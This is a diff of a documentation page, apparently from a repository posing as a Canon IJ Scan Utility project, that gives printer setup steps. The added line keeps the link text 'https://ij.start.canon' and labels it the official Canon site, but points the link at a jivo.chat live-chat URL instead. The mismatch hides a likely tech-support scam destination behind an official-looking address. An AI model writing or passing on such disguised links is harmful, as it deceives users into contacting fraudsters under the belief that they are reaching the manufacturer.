tomtomgarry/Canonijscanutility/docs/source/index.rst

 Launch any web browser on your Windows computer.

 2️⃣ **Visit the Canon Support Website:**
-Go to `ij.start.canon <https://ij.start.canon>`_ — the official Canon printer setup and driver download site.
+Go to `https://ij.start.canon <https://jivo.chat/KlZSRejpBm>`_ — the official Canon printer setup and driver download site.

 3️⃣ **Enter Your Printer Model:**
 Type your Canon printer’s model number in the search bar and select it from the dropdown list.